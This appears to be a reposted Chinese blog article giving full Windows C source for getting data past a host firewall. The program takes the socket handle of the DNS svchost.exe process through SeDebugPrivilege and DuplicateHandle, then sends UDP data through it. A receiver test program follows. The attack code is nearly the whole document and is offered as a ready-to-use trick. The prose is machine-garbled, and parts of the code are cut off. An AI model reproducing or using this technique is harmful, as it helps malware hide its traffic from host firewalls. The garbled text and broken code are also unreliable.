穿透防火墙的数据传输方法(二)

  必要说明的是，在现实编程中出现了很多问题，好比说获取svchost对使用户名时没有权限（但是能够操纵LOCAL SERVICE）、在句柄值为0x2c时进行getsockname时会停止运转等等。具体解决要领请您细致阅读源代码中的注释部门。
  末了，我们可以再用测试代码看看结果。测试步调：
  源代码部门：
  /*++
  Made By ZwelL
  zwell@sohu.com
  2005.4.12
  --*/
  #include
  #include
  #include
  #pragma comment(lib, "ws2_32")
  #pragma comment(lib, "wtsapi32")
  #define NT_SUCCESS(status)          ((NTSTATUS)(status)>=0)
  #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
  typedef LONG    NTSTATUS;
  typedef struct _SYSTEM_HANDLE_INFORMATION
  {
  ULONG            ProcessId;
  UCHAR            ObjectTypeNumber;
  UCHAR            Flags;
  USHORT            Handle;
  PVOID            Object;
  ACCESS_MASK        GrantedAccess;
  } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
  typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
  ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;
  BOOL LocateNtdllEntry ( void )
  {
  BOOL    ret         = FALSE;
  char    NTDLL_DLL[] = "ntdll.dll";
  HMODULE ntdll_dll   = NULL;
  if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )
  {
  printf( "GetModuleHandle() failed");
  return( FALSE );
  }
  if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) )
  {
  goto LocateNtdllEntry_exit;
  }
  ret = TRUE;
  LocateNtdllEntry_exit:
  if ( FALSE == ret )
  {
  printf( "GetProcAddress() failed");
  }
  ntdll_dll = NULL;
  return( ret );
  }
  /*++
  This routine is used to get a process's username from it's SID
  --*/
  BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)
  {
  // sanity checks and default value
  if (pUserSid == NULL)
  return false;
  strcpy(szUserName, "?");
  SID_NAME_USE   snu;
  TCHAR          szUser[_MAX_PATH];
  DWORD          chUser = _MAX_PATH;
  PDWORD         pcchUser = &chUser;
  TCHAR          szDomain[_MAX_PATH];
  DWORD          chDomain = _MAX_PATH;
  PDWORD         pcchDomain = &chDomain;
  // Retrieve user name and domain name based on user's SID.
  if (
  ::LookupAccountSid(
  NULL,
  pUserSid,
  szUser,
  pcchUser,
  szDomain,
  pcchDomain,
  &snu
  )
  )
  {
  wsprintf(szUserName, "%s", szUser);
  }
  else
  {
  return false;
  }
  return true;
  } 
  /*++
  This routine is used to get the DNS process's Id
  Here, I use WTSEnumerateProcesses to get process user Sid,
  and then get the process user name. Beacause as it's a "NETWORK SERVICE",
  we cann't use OpenProcessToken to catch the DNS process's token information,
  even if we has the privilege in catching the SYSTEM's.
  --*/
  DWORD GetDNSProcessId()
  {
  PWTS_PROCESS_INFO pProcessInfo = NULL;
  DWORD             ProcessCount = 0;
  char              szUserName[255];
  DWORD              Id = -1;
  if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))
  {
  // dump each process description
  for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++)
  {
  if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 )
  {
  GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);
  if( strcmp(szUserName, "NETWORK SERVICE") == 0)
  {
  Id = pProcessInfo[CurrentProcess].ProcessId;
  break;
  }
  }
  }
  WTSFreeMemory(pProcessInfo);
  }
  return Id;
  }
  /*++
  This doesn't work as we know, sign...
  but you can use the routine for other useing...
  --*/
  /*
  BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)
  {
  HANDLE hProcess = NULL,
  hAccessToken = NULL;
  TCHAR InfoBuffer[1000], szDomainName[200];
  PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
  DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;
  SID_NAME_USE snu;
  hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);
  if(hProcess == NULL)
  {
  printf("OpenProcess wrong");
  CloseHandle(hProcess);
  return false;
  }
  if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))
  {
  printf("OpenProcessToken wrong:%08x", GetLastError());
  return false;
  }
  GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,
  1000, &dwInfoBufferSize);
  LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,
  &dwAccountSize,szDomainName, &dwDomainSize, &snu);
  if(hProcess)
  CloseHandle(hProcess);
  if(hAccessToken)
  CloseHandle(hAccessToken);
  return true;
  }*/
  /*++
  Now, it is the most important stuff... ^_^
  --*/
  SOCKET GetSocketFromId (DWORD PID)
  {
  NTSTATUS                     status;
  PVOID                        buf   = NULL;
  ULONG                        size  = 1;
  ULONG                        NumOfHandle = 0;
  ULONG                        i;
  PSYSTEM_HANDLE_INFORMATION    h_info  = NULL;
  HANDLE    sock = NULL;
  DWORD    n;
  buf=malloc(0x1000);
  if(buf == NULL)
  {
  printf("malloc wrong\n");
  return NULL;
  }
  status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );
  if(STATUS_INFO_LENGTH_MISMATCH == status)
  {
  free(buf);
  buf=malloc(n);
  if(buf == NULL)
  {
  printf("malloc wrong\n");
  return NULL;
  }
  status = ZwQuerySystemInformation( 0x10, buf, n, NULL);
  }
  else
  {
  printf("ZwQuerySystemInformation wrong\n");
  return NULL;
  }
  NumOfHandle = *(ULONG*)buf;
  h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);
  for(i = 0; i   {
  try
  {
  if( ( h_info[i].ProcessId == PID )  && ( h_info[i].ObjectTypeNumber == 0x1c )
  && (h_info[i].Handle!=0x2c)    // I don't know why if the Handle equal to 0x2c, in my test, it stops at getsockname()
  // So I jump over this situation...
  // May be it's different in your system,
  ) //wind2000 is 0x1a
  {
  //printf("Handle:0x%x Type:%08x\n",h_info[i].Handle, h_info[i].ObjectTypeNumber);
  if( 0 == DuplicateHandle(
  OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID),
  (HANDLE)h_info[i].Handle,
  GetCurrentProcess(),
  &sock,
  STANDARD_RIGHTS_REQUIRED,
  true,
  DUPLICATE_SAME_ACCESS)
  )
  {
  printf("DuplicateHandle wrong:%8x", GetLastError());
  continue;
  }
  //printf("DuplicateHandle ok\n");
  sockaddr_in name = {0};
  name.sin_family = AF_INET;
  int namelen = sizeof(sockaddr_in);
  getsockname( (SOCKET)sock, (sockaddr*)&name, &namelen );
  //printf("PORT=%5d\n",    ntohs( name.sin_port ));
  if(ntohs(name.sin_port)>0)    // if port > 0, then we can use it
  break;
  }
  }
  catch(...)
  {
  continue;
  }
  }
  if ( buf != NULL )
  {
  free( buf );
  }
  return (SOCKET)sock;
  }
  /*++
  This is not required...
  --*/
  BOOL EnablePrivilege (PCSTR name)
  {
  HANDLE hToken;
  BOOL rv;
  TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };
  LookupPrivilegeValue (
  0,
  name,
  &priv.Privileges[0].Luid
  );
  priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  OpenProcessToken(
  GetCurrentProcess (),
  TOKEN_ADJUST_PRIVILEGES,
  &hToken
  );
  AdjustTokenPrivileges (
  hToken,
  FALSE,
  &priv,
  sizeof priv,
  0,
  0
  );
  rv = GetLastError () == ERROR_SUCCESS;
  CloseHandle (hToken);
  return rv;
  }
  void main()
  {
  WSADATA wsaData;
  char    testbuf[255];
  SOCKET    sock;
  sockaddr_in RecvAddr;
  int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
  if (iResult != NO_ERROR)
  printf("Error at WSAStartup()\n");
  if(!LocateNtdllEntry())
  return;
  if(!EnablePrivilege (SE_DEBUG_NAME))
  {
  printf("EnablePrivilege wrong\n");
  return;
  }
  sock = GetSocketFromId(GetDNSProcessId());
  if( sock==NULL)
  {
  printf("GetSocketFromId wrong\n");
  return;
  }
  //Change there value...
  RecvAddr.sin_family = AF_INET;
  RecvAddr.sin_port = htons(5555);
  RecvAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
  if(SOCKET_ERROR == sendto(sock,
  "test",
  5,
  0,
  (SOCKADDR *) &RecvAddr,
  sizeof(RecvAddr)))
  {
  printf("sendto wrong:%d\n", WSAGetLastError());
  }
  else
  {
  printf("send ok... Have fun, right? ^_^\n");
  }
  getchar();
  //WSACleanup();
  return;
  }
  测试代码部门：
  /*++
  UdpReceiver
  --*/
  #include
  #include "winsock2.h"
  #pragma comment(lib, "ws2_32")
  void main()
  {
  WSADATA wsaData;
  SOCKET RecvSocket;
  sockaddr_in RecvAddr;
  int Port = 5555;
  char RecvBuf[1024];
  int  BufLen = 1024;
  sockaddr_in SenderAddr;
  int SenderAddrSize = sizeof(SenderAddr);
  //-----------------------------------------------
  // Initialize Winsock
  WSAStartup(MAKEWORD(2,2), &wsaData);
  //-----------------------------------------------
  // Create a receiver socket to receive datagrams
  RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
  //-----------------------------------------------
  // Bind the socket to any address and the specified port.
  RecvAddr.sin_family = AF_INET;
  RecvAddr.sin_port = htons(Port);
  RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);
  bind(RecvSocket, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr));
  //-----------------------------------------------
  // Call the recvfrom function to receive datagrams
  // on the bound socket.
  printf("Receiving datagrams...\n");
  while(1)
  {
  recvfrom(RecvSocket,
  RecvBuf,
  BufLen,
  0,
  (SOCKADDR *)&SenderAddr,
  &SenderAddrSize);
  printf("%s\n", RecvBuf);
  }
  //-----------------------------------------------
  // Close the socket when finished receiving datagrams
  printf("Finished receiving. Closing socket.\n");
  closesocket(RecvSocket);
  //-----------------------------------------------
  // Clean up and exit.
  printf("Exiting.\n");
  WSACleanup();
  return;
  }
  1、在一台机器上执行UdpReceiver；
  2、在安装防火墙的机器上执行第一个程序。
  小结：在本例的源代码中，因为要在多个svchost.exe历程中找出DNS历程句柄，所以通过用户名进行果断。实在本来是筹划采用OpenProcessToken的，但在编程中发现始终不克不及实现，只好换了要领。例子中还用到了wtsapi32库函数。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：